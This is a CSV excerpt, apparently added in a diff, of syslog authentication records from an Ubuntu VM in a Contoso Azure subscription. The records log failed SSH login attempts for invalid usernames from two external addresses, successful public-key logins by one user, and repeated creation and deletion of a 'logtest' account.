+8589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:54,UbuntuDevEnv,2019-06-25 21:39:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:56,UbuntuDevEnv,2019-06-25 21:39:55,auth,UbuntuDevEnv,info,Failed password for invalid user dev from 165.22.96.224 port 49316 ssh2,12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,165.22.96.2,49316,,
+8591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:56,UbuntuDevEnv,2019-06-25 21:39:56,auth,UbuntuDevEnv,info,Disconnected from invalid user dev 165.22.96.224 port 49316 [preauth],12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dev,165.22.96.2,49316,,
+8592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:39:56,UbuntuDevEnv,2019-06-25 21:39:56,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 49316:11: Bye Bye [preauth],12182,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,49316,,
+8593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:43,UbuntuDevEnv,2019-06-25 21:40:43,auth,UbuntuDevEnv,info,Invalid user sinusbot from 134.209.233.74 port 46618,12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,134.209.233.7,46618,,
+8594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:43,UbuntuDevEnv,2019-06-25 21:40:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:43,UbuntuDevEnv,2019-06-25 21:40:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:46,UbuntuDevEnv,2019-06-25 21:40:45,auth,UbuntuDevEnv,info,Failed password for invalid user sinusbot from 134.209.233.74 port 46618 ssh2,12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,134.209.233.7,46618,,
+8597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:46,UbuntuDevEnv,2019-06-25 21:40:45,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 46618:11: Bye Bye [preauth],12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,46618,,
+8598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:40:46,UbuntuDevEnv,2019-06-25 21:40:45,auth,UbuntuDevEnv,info,Disconnected from invalid user sinusbot 134.209.233.74 port 46618 [preauth],12361,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sinusbot,134.209.233.7,46618,,
+8599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:24,UbuntuDevEnv,2019-06-25 21:41:24,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),12415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+8600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:24,UbuntuDevEnv,2019-06-25 21:41:24,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.57 port 49417 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,12415,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.5,49417,,
+8601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:24,UbuntuDevEnv,2019-06-25 21:41:24,authpriv,UbuntuDevEnv,info,pam_unix(systemd-user:session): session opened for user peteb by (uid=0),,10.0.1.4,systemd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+8602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:24,UbuntuDevEnv,2019-06-25 21:41:24,auth,UbuntuDevEnv,info,New session 50 of user peteb.,1161,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+8603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:26,UbuntuDevEnv,2019-06-25 21:41:25,auth,UbuntuDevEnv,info,Accepted publickey for peteb from 131.107.147.57 port 27850 ssh2: RSA SHA256:iMp4nnErVTXWJR2JKUEMSR8RuRXyPO4X/Ci6DX1piFM,12512,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,131.107.147.5,27850,,
+8604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:26,UbuntuDevEnv,2019-06-25 21:41:25,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session opened for user peteb by (uid=0),12512,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,0,
+8605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:26,UbuntuDevEnv,2019-06-25 21:41:25,auth,UbuntuDevEnv,info,New session 52 of user peteb.,1161,10.0.1.4,systemd-logind,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+8606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:31,UbuntuDevEnv,2019-06-25 21:41:31,auth,UbuntuDevEnv,info,Invalid user ftp1 from 165.22.96.224 port 39272,12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,165.22.96.2,39272,,
+8607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:31,UbuntuDevEnv,2019-06-25 21:41:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:31,UbuntuDevEnv,2019-06-25 21:41:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:33,UbuntuDevEnv,2019-06-25 21:41:32,auth,UbuntuDevEnv,info,Failed password for invalid user ftp1 from 165.22.96.224 port 39272 ssh2,12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,165.22.96.2,39272,,
+8610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:33,UbuntuDevEnv,2019-06-25 21:41:33,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 39272:11: Bye Bye [preauth],12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,39272,,
+8611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:33,UbuntuDevEnv,2019-06-25 21:41:33,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp1 165.22.96.224 port 39272 [preauth],12690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,165.22.96.2,39272,,
+8612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:52,UbuntuDevEnv,2019-06-25 21:41:51,authpriv,UbuntuDevEnv,info,"new group: name=logtest, GID=1004",12909,10.0.1.4,useradd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:52,UbuntuDevEnv,2019-06-25 21:41:51,authpriv,UbuntuDevEnv,info,"new user: name=logtest, UID=1004, GID=1004, home=/home/logtest, shell=/bin/bash",12909,10.0.1.4,useradd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:59,UbuntuDevEnv,2019-06-25 21:41:58,authpriv,UbuntuDevEnv,info,delete user 'logtest',12939,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:59,UbuntuDevEnv,2019-06-25 21:41:58,authpriv,UbuntuDevEnv,info,removed group 'logtest' owned by 'logtest',12939,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:41:59,UbuntuDevEnv,2019-06-25 21:41:58,authpriv,UbuntuDevEnv,info,removed shadow group 'logtest' owned by 'logtest',12939,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:05,UbuntuDevEnv,2019-06-25 21:42:04,authpriv,UbuntuDevEnv,info,"group added to /etc/group: name=logtest, GID=1004",12968,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:05,UbuntuDevEnv,2019-06-25 21:42:04,authpriv,UbuntuDevEnv,info,group added to /etc/gshadow: name=logtest,12968,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:05,UbuntuDevEnv,2019-06-25 21:42:04,authpriv,UbuntuDevEnv,info,"new group: name=logtest, GID=1004",12968,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:05,UbuntuDevEnv,2019-06-25 21:42:04,authpriv,UbuntuDevEnv,info,"new user: name=logtest, UID=1004, GID=1004, home=/home/logtest, shell=/bin/bash",12972,10.0.1.4,useradd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:08,UbuntuDevEnv,2019-06-25 21:42:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:08,UbuntuDevEnv,2019-06-25 21:42:07,auth,UbuntuDevEnv,info,Invalid user nmwangi from 134.209.233.74 port 35444,12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,134.209.233.7,35444,,
+8623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:08,UbuntuDevEnv,2019-06-25 21:42:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:10,UbuntuDevEnv,2019-06-25 21:42:10,auth,UbuntuDevEnv,info,Failed password for invalid user nmwangi from 134.209.233.74 port 35444 ssh2,12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,134.209.233.7,35444,,
+8625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:10,UbuntuDevEnv,2019-06-25 21:42:10,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 35444:11: Bye Bye [preauth],12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,35444,,
+8626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:10,UbuntuDevEnv,2019-06-25 21:42:10,auth,UbuntuDevEnv,info,Disconnected from invalid user nmwangi 134.209.233.74 port 35444 [preauth],12995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nmwangi,134.209.233.7,35444,,
+8627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:14,UbuntuDevEnv,2019-06-25 21:42:14,authpriv,UbuntuDevEnv,notice,pam_unix(passwd:chauthtok): password changed for logtest,12984,10.0.1.4,passwd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:17,UbuntuDevEnv,2019-06-25 21:42:17,authpriv,UbuntuDevEnv,info,changed user 'logtest' information,13020,10.0.1.4,chfn,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:31,UbuntuDevEnv,2019-06-25 21:42:31,authpriv,UbuntuDevEnv,info,removed group 'logtest' owned by 'logtest',13091,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:31,UbuntuDevEnv,2019-06-25 21:42:31,authpriv,UbuntuDevEnv,info,delete user 'logtest',13091,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:42:31,UbuntuDevEnv,2019-06-25 21:42:31,authpriv,UbuntuDevEnv,info,removed shadow group 'logtest' owned by 'logtest',13091,10.0.1.4,userdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:01,UbuntuDevEnv,2019-06-25 21:43:00,authpriv,UbuntuDevEnv,info,"group added to /etc/group: name=logtest, GID=1004",13205,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:01,UbuntuDevEnv,2019-06-25 21:43:00,authpriv,UbuntuDevEnv,info,group added to /etc/gshadow: name=logtest,13205,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:01,UbuntuDevEnv,2019-06-25 21:43:00,authpriv,UbuntuDevEnv,info,"new group: name=logtest, GID=1004",13205,10.0.1.4,groupadd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:06,UbuntuDevEnv,2019-06-25 21:43:06,authpriv,UbuntuDevEnv,info,group 'logtest' removed from /etc/group,13230,10.0.1.4,groupdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:06,UbuntuDevEnv,2019-06-25 21:43:06,authpriv,UbuntuDevEnv,info,group 'logtest' removed,13230,10.0.1.4,groupdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:06,UbuntuDevEnv,2019-06-25 21:43:06,authpriv,UbuntuDevEnv,info,group 'logtest' removed from /etc/gshadow,13230,10.0.1.4,groupdel,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:15,UbuntuDevEnv,2019-06-25 21:43:14,auth,UbuntuDevEnv,info,Invalid user im from 165.22.96.224 port 57184,13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,165.22.96.2,57184,,
+8639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:15,UbuntuDevEnv,2019-06-25 21:43:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.96.224,13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.96.2,,0,
+8640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:15,UbuntuDevEnv,2019-06-25 21:43:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:17,UbuntuDevEnv,2019-06-25 21:43:17,auth,UbuntuDevEnv,info,Failed password for invalid user im from 165.22.96.224 port 57184 ssh2,13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,165.22.96.2,57184,,
+8642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:17,UbuntuDevEnv,2019-06-25 21:43:17,auth,UbuntuDevEnv,info,Received disconnect from 165.22.96.224 port 57184:11: Bye Bye [preauth],13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.96.2,57184,,
+8643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:17,UbuntuDevEnv,2019-06-25 21:43:17,auth,UbuntuDevEnv,info,Disconnected from invalid user im 165.22.96.224 port 57184 [preauth],13264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,im,165.22.96.2,57184,,
+8644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:34,UbuntuDevEnv,2019-06-25 21:43:33,auth,UbuntuDevEnv,info,Invalid user iag from 134.209.233.74 port 52502,13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,134.209.233.7,52502,,
+8645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:34,UbuntuDevEnv,2019-06-25 21:43:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+8646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:34,UbuntuDevEnv,2019-06-25 21:43:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=134.209.233.74,13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,134.209.233.7,,0,
+8647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:36,UbuntuDevEnv,2019-06-25 21:43:36,auth,UbuntuDevEnv,info,Failed password for invalid user iag from 134.209.233.74 port 52502 ssh2,13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,134.209.233.7,52502,,
+8648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:36,UbuntuDevEnv,2019-06-25 21:43:36,auth,UbuntuDevEnv,info,Disconnected from invalid user iag 134.209.233.74 port 52502 [preauth],13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,iag,134.209.233.7,52502,,
+8649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:43:36,UbuntuDevEnv,2019-06-25 21:43:36,auth,UbuntuDevEnv,info,Received disconnect from 134.209.233.74 port 52502:11: Bye Bye [preauth],13344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.233.7,52502,,
+8650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 21:44:57,UbuntuDevEnv,2019-06-25 21:44:56,auth,UbuntuDevEnv,info,Invalid user nue from 134.209.233.74 port 41332,20487,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nue,134.209.233.7,41332,,
